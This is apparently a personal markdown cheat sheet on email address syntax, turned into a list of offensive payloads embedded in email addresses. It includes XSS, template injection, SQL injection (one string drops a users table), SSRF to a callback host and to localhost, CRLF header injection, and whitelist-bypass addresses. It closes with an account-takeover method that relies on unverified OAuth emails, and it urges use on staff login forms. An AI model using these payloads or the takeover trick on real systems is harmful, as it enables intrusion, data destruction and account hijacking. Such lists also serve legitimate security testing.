Exploit_Email.md

Exploit Email

• Email contains local part and domain part separated by @

Rules Specificly For local part

• A-Z and (a-z)
• 0 to 9
• ... (dot in middle)
• !#$%&'*+-/=?^_`{|}~ (printable characters)
• International Characters (ex : turkish names )

I you quote local part of email you can add anything almost anything even emoji

• "@@@''@"@gmail.com (quote and back slashes)
• "@"@example.com (@)
• " "@example.com (spaced and tabs)
• "emoji"@gmail.com (emojis)

Rules For Domain Part

• More Strict
• Latin Letters (Upper and Lower)
• Digits
• • (Hyphen), not as first or last character
• quare bracket to include IP rahim@[127.0.0.1] or rahim@[ipv6:2001:db8::1]

Special Cases

• • , - {} in rare occasion can be used for tagging
• rahim+hacker@example.com == rahim@example.com
• Comments as rahim(i am a comment)@example.com == rahim@example.com

SOme Valid Payloads

XSS : 
test+(<script>alert(0)</script>)@gmail.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com

TEMPLATE INJECTION :
"<%= 7*7 %>"@example.com
test+(${{7*7}})@example.com

SQLi : 
"' OR 1=1 --"@example.com
"mail')DROP TABLE users;--"@example.com

SSRF : 
john@burpcollan.net
john@[127.0.0.1]

Parameter Pollution : 
victim&attacker=attacker@example.com

Email Header Injection :
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com

Wildcard Abuse : 
%@example.com

Email White Listing Bypass

• rahim(;rahim@gmail.com;)@company.com
• rahim@rahim.io(@company.com)
• rahim+(@company.com)@gmail.com

Use them where staffs can login

Exploit 1

• i have a account in github with rahim@gmail.com
• Then i created a account in yahoo with rahim@gmail.com but did'nt verify that
• Now i logged in with yahoo in my target and account takeover